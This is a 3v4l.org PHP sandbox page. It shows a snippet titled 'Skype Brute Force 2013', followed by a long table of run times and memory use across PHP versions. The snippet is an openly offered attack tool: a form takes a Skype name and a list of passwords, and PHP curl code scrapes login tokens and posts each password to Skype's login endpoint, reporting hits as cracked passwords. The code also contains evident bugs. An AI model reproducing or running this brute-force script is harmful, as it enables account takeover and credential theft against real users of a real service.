3v4l.org

run code in 300+ PHP versions simultaneously
<form method='POST'> <title>Skype Brute Force 2013 By archavin</title> <center> <img src='http://www.promusicacademy.com/wp-content/uploads/2012/11/Skype-icon.png'><br> <input type='text' name='duedipicca' placeholder='Skype Name' size='38'><br> <textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br> <input type='submit' value='Start Brute' name='brute'><br> </center> </form> <? @set_time_limit(0); # Brute Force Skype PHP Version # Coded By : xSecurity # Greets To : (( Sec4ever.CoM )) - (( x3 Group )) - (( is-sec.CoM )) $skype = "https://login.skype.com/login?application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"; # Username & Password $username = $_POST['skypename']; $password = explode("\r\n", $_POST['passwords']); # time zone $time = date_default_timezone_set("Asia/Riyadh"); $date = date('H:i:s'); //Returns IST # header $header = "HTTP/1.1 302"; # Fucntion Detalis function xsecurity($skype) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $run = curl_exec($ch); preg_match('/<input type="hidden" name="session_token" value="(.*?)"/', $run, $hash); preg_match('/<input type="hidden" name="pie" id="pie" value="(.*?)"/', $run, $piie); preg_match('/<input type="hidden" name="etm" id="etm" value="(.*?)"/', $run, $etmm); return $hash[1]."|:|".$piie[1]."|:|".$etmm[1]; } # Explode Detalis $xsec = explode("|:|" ,xsecurity($skype)); $token = $xsec[0]; $pie = $xsec[1]; $etm = $xsec[2]; # Function Brute function brute($skype,$username,$pass,$header) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$username}&password={$pass}&timezone_field=%2B03%7C00&pie={$pie}&etm={$etm}&js_time={$date}&session_token={$token}&application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $brute = curl_exec($ch); if(strstr($brute, $header)) { echo "<font face='Tahoma' size='2'><center>[+] Password Cracked is <b>{$pass}</b> --> <b>{$username}</b></font></center>"; } return $brute; } if($_POST['brute']) { foreach($password as $pass) { brute($skype,$username,$pass,$header); } } echo "<center><br><font face='Tahoma' size='5' color='red'>Coded By : archavin cyberizm.org</font></center>"; ?>

Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).

VersionSystem time (s)User time (s)Memory (MiB)
8.3.60.0040.01116.50
8.3.50.0070.00716.38
8.3.40.0110.00718.42
8.3.30.0060.00918.55
8.3.20.0070.00020.29
8.3.10.0050.00321.94
8.3.00.0040.00417.80
8.2.180.0060.01018.04
8.2.170.0170.00322.96
8.2.160.0160.00320.39
8.2.150.0080.00024.18
8.2.140.0070.00024.66
8.2.130.0040.00426.16
8.2.120.0050.00317.50
8.2.110.0040.00422.26
8.2.100.0110.00017.93
8.2.90.0000.00719.28
8.2.80.0080.00017.97
8.2.70.0070.00317.62
8.2.60.0070.00417.93
8.2.50.0040.00418.07
8.2.40.0050.00519.11
8.2.30.0030.00320.67
8.2.20.0070.00017.48
8.2.10.0040.00417.97
8.2.00.0080.00018.01
8.1.280.0130.00625.92
8.1.270.0000.00823.91
8.1.260.0000.00826.35
8.1.250.0040.00428.09
8.1.240.0070.00322.35
8.1.230.0080.00319.31
8.1.220.0040.00417.74
8.1.210.0080.00018.77
8.1.200.0000.00817.10
8.1.190.0030.00617.23
8.1.180.0050.00218.10
8.1.170.0040.00420.29
8.1.160.0000.00721.85
8.1.150.0000.00718.76
8.1.140.0090.00021.17
8.1.130.0030.00317.53
8.1.120.0050.00317.26
8.1.110.0000.00717.32
8.1.100.0030.00317.23
8.1.90.0000.00717.32
8.1.80.0040.00417.27
8.1.70.0030.00317.30
8.1.60.0000.00717.42
8.1.50.0070.00017.31
8.1.40.0050.00317.36
8.1.30.0000.00817.59
8.1.20.0030.00517.39
8.1.10.0040.00417.44
8.1.00.0040.00417.39
8.0.300.0030.00518.84
8.0.290.0000.00716.63
8.0.280.0030.00318.31
8.0.270.0040.00317.17
8.0.260.0040.00417.12
8.0.250.0030.00316.83
8.0.240.0090.00016.71
8.0.230.0040.00416.72
8.0.220.0050.00216.67
8.0.210.0000.00816.67
8.0.200.0070.00016.65
8.0.190.0040.00416.80
8.0.180.0080.00316.74
8.0.170.0000.00816.83
8.0.160.0050.00316.76
8.0.150.0000.00716.68
8.0.140.0000.00816.69
8.0.130.0030.00313.43
8.0.120.0040.00416.71
8.0.110.0000.00716.81
8.0.100.0080.00016.72
8.0.90.0000.00816.80
8.0.80.0040.01116.68
8.0.70.0000.00816.74
8.0.60.0000.00816.78
8.0.50.0040.00416.78
8.0.30.0130.00417.00
8.0.20.0090.00917.40
8.0.10.0000.00716.68
8.0.00.0100.00816.62
7.4.330.0000.00515.08
7.4.320.0000.00616.51
7.4.300.0000.00616.47
7.4.290.0000.00716.39
7.4.280.0080.00016.40
7.4.270.0030.00316.36
7.4.260.0040.00416.44
7.4.250.0040.00416.35
7.4.240.0040.00216.39
7.4.230.0030.00316.40
7.4.220.0060.01216.55
7.4.210.0070.00716.50
7.4.200.0070.00016.44
7.4.160.0150.00016.39
7.4.150.0090.00917.40
7.4.140.0100.00817.86
7.4.130.0090.00816.46
7.4.120.0050.01416.34
7.4.110.0100.00716.20
7.4.100.0080.00816.38
7.4.90.0140.00316.54
7.4.80.0060.01819.39
7.4.70.0000.01816.20
7.4.60.0130.01016.47
7.4.50.0080.00016.27
7.4.40.0170.00016.24
7.4.30.0160.00616.59
7.4.00.0070.01014.93
7.3.330.0030.00313.48
7.3.320.0040.00313.49
7.3.310.0030.00316.29
7.3.300.0070.00015.96
7.3.290.0090.00516.15
7.3.280.0110.00716.13
7.3.270.0190.00017.40
7.3.260.0030.01316.37
7.3.250.0080.00916.37
7.3.240.0130.00916.10
7.3.230.0110.00516.41
7.3.210.0100.00716.35
7.3.200.0130.00316.54
7.3.190.0070.01016.19
7.3.180.0030.01916.20
7.3.170.0060.01416.36
7.3.160.0130.00316.32
7.3.10.0050.00716.67
7.3.00.0090.00516.72
7.2.330.0060.01116.56
7.2.320.0090.00616.49
7.2.310.0030.01316.55
7.2.300.0060.01016.57
7.2.290.0160.00616.59
7.2.130.0080.00516.78
7.2.120.0090.00316.91
7.2.110.0070.00517.03
7.2.100.0050.00916.93
7.2.90.0080.00616.90
7.2.80.0100.00316.76
7.2.70.0110.00416.94
7.2.60.0070.00717.01
7.2.50.0090.00517.10
7.2.40.0030.01016.99
7.2.30.0110.00617.06
7.2.20.0080.00816.97
7.2.10.0080.00717.08
7.2.00.0060.00717.82
7.1.250.0050.00515.89
7.1.200.0100.00015.70
7.1.100.0070.01017.97
7.1.70.0000.01117.08
7.1.60.0040.01119.50
7.1.50.0060.01617.15
7.1.00.0070.07322.46
7.0.200.0000.00716.94
7.0.100.0470.10019.97
7.0.90.0500.08319.95
7.0.80.0500.08019.97
7.0.70.0400.07720.18
7.0.60.0400.08719.93
7.0.50.0500.07720.34
7.0.40.0100.08319.99
7.0.30.0130.07719.95
7.0.20.0030.09020.04
7.0.10.0070.07720.03
7.0.00.0070.06320.16
5.6.280.0000.06721.18
5.6.250.0100.04320.62
5.6.240.0030.08320.67
5.6.230.0070.08320.71
5.6.220.0130.07020.75
5.6.210.0100.08020.79
5.6.200.0130.07720.99
5.6.190.0070.07321.05
5.6.180.0030.06721.06
5.6.170.0130.05721.06
5.6.160.0170.04321.07
5.6.150.0030.08721.00
5.6.140.0030.05021.16
5.6.130.0100.08020.95
5.6.120.0070.08721.05
5.6.110.0070.07721.10
5.6.100.0230.06021.03
5.6.90.0030.05321.11
5.6.80.0170.04320.49
5.6.70.0130.04720.54
5.6.60.0070.04720.46
5.6.50.0070.04020.50
5.6.40.0100.03320.34
5.6.30.0030.04020.42
5.6.20.0030.04720.39
5.6.10.0070.03720.49
5.6.00.0000.04720.42
5.5.380.0170.05320.48
5.5.370.0070.08020.59
5.5.360.0070.08020.40
5.5.350.0100.07320.47
5.5.340.0030.06020.76
5.5.330.0030.05320.86
5.5.320.0070.08020.93
5.5.310.0100.08320.71
5.5.300.0130.06720.83
5.5.290.0070.09020.80
5.5.280.0030.08720.75
5.5.270.0070.08320.88
5.5.260.0130.08020.88
5.5.250.0070.07720.71
5.5.240.0100.04720.18
5.5.230.0100.07020.31
5.5.220.0030.04320.13
5.5.210.0070.03720.13
5.5.200.0070.03720.13
5.5.190.0130.03020.13
5.5.180.0030.04720.11
5.5.160.0030.04020.25
5.5.150.0070.03720.13
5.5.140.0070.06320.24
5.5.130.0170.07020.29
5.5.120.0070.05720.16
5.5.110.0000.03720.23
5.5.100.0000.04020.18
5.5.90.0100.03320.20
5.5.80.0070.04320.19
5.5.70.0100.04320.14
5.5.60.0030.04320.06
5.5.50.0030.06020.14
5.5.40.0070.03320.18
5.5.30.0070.03720.12
5.5.20.0000.04020.17
5.5.10.0030.04020.06
5.5.00.0030.03020.05
5.4.450.0100.07019.52
5.4.440.0100.08019.48
5.4.430.0070.06719.42
5.4.420.0130.07319.50
5.4.410.0030.08319.22
5.4.400.0100.05719.05
5.4.390.0070.03718.82
5.4.380.0070.05719.22
5.4.370.0000.07719.12
5.4.360.0070.04019.23
5.4.350.0030.04019.18
5.4.340.0000.04019.12
5.4.320.0070.03019.13
5.4.310.0000.05019.14
5.4.300.0000.03719.22
5.4.290.0000.06719.14
5.4.280.0100.05019.04
5.4.270.0000.04319.04
5.4.260.0030.05019.12
5.4.250.0070.02719.03
5.4.240.0030.08018.85
5.4.230.0100.02719.17
5.4.220.0000.04019.14
5.4.210.0070.03318.89
5.4.200.0030.03718.93
5.4.190.0000.03718.93
5.4.180.0000.03719.20
5.4.170.0030.03319.02
5.4.160.0030.04719.11
5.4.150.0130.07018.86
5.4.140.0100.03716.38
5.4.130.0030.03316.36
5.4.120.0070.03016.46
5.4.110.0070.03316.46
5.4.100.0000.03716.52
5.4.90.0070.02716.48
5.4.80.0070.04316.38
5.4.70.0100.03016.52
5.4.60.0000.04016.34
5.4.50.0030.07316.44
5.4.40.0100.03716.45
5.4.30.0070.04716.34
5.4.20.0070.05316.45
5.4.10.0100.07316.43
5.4.00.0100.06015.78
5.3.290.0070.07014.48
5.3.280.0030.03714.58
5.3.270.0030.03014.51
5.3.260.0000.03714.59
5.3.250.0030.03014.54
5.3.240.0000.04014.60
5.3.230.0000.04014.59
5.3.220.0000.04014.38
5.3.210.0000.04014.41
5.3.200.0070.03714.50
5.3.190.0000.04014.55
5.3.180.0000.04014.41
5.3.170.0030.05314.55
5.3.160.0030.08014.52
5.3.150.0000.08014.54
5.3.140.0030.06714.54
5.3.130.0070.06014.54
5.3.120.0030.04314.41
5.3.110.0030.06714.49
5.3.100.0070.06013.94
5.3.90.0170.06314.01
5.3.80.0100.04314.02
5.3.70.0070.04013.87
5.3.60.0070.03313.77
5.3.50.0070.08013.88
5.3.40.0070.06713.89
5.3.30.0030.05313.77
5.3.20.0030.05313.55
5.3.10.0070.04713.63
5.3.00.0030.04013.54
5.2.170.0000.06312.75
5.2.160.0000.04312.75
5.2.150.0100.05712.75
5.2.140.0070.05012.75
5.2.130.0100.05312.75
5.2.120.0030.05712.75
5.2.110.0070.05312.75
5.2.100.0070.05012.75
5.2.90.0030.05712.75
5.2.80.0100.06012.75
5.2.70.0000.06312.75
5.2.60.0030.06012.75
5.2.50.0000.04012.75
5.2.40.0100.02712.75
5.2.30.0100.05012.75
5.2.20.0070.05712.75
5.2.10.0030.05012.75
5.2.00.0000.06312.75
5.1.60.0000.05012.75
5.1.50.0030.03012.75
5.1.40.0030.05312.75
5.1.30.0130.03712.75
5.1.20.0030.05712.75
5.1.10.0000.05712.75
5.1.00.0030.04712.75
5.0.50.0070.03312.75
5.0.40.0000.04712.75
5.0.30.0070.05012.75
5.0.20.0000.03712.75
5.0.10.0030.04712.75
5.0.00.0000.07012.75
4.4.90.0000.03712.75
4.4.80.0000.03712.75
4.4.70.0030.03312.75
4.4.60.0000.03312.75
4.4.50.0030.02312.75
4.4.40.0030.05312.75
4.4.30.0030.03312.75
4.4.20.0030.02712.75
4.4.10.0030.03012.75
4.4.00.0030.03012.75
4.3.110.0000.03712.75
4.3.100.0030.03712.75
4.3.90.0000.03712.75
4.3.80.0000.05012.75
4.3.70.0000.03712.75
4.3.60.0000.03312.75
4.3.50.0000.03712.75
4.3.40.0030.05312.75
4.3.30.0030.03712.75
4.3.20.0030.03312.75
4.3.10.0000.03312.75
4.3.00.0000.02312.75

preferences:
44.36 ms | 400 KiB | 5 Q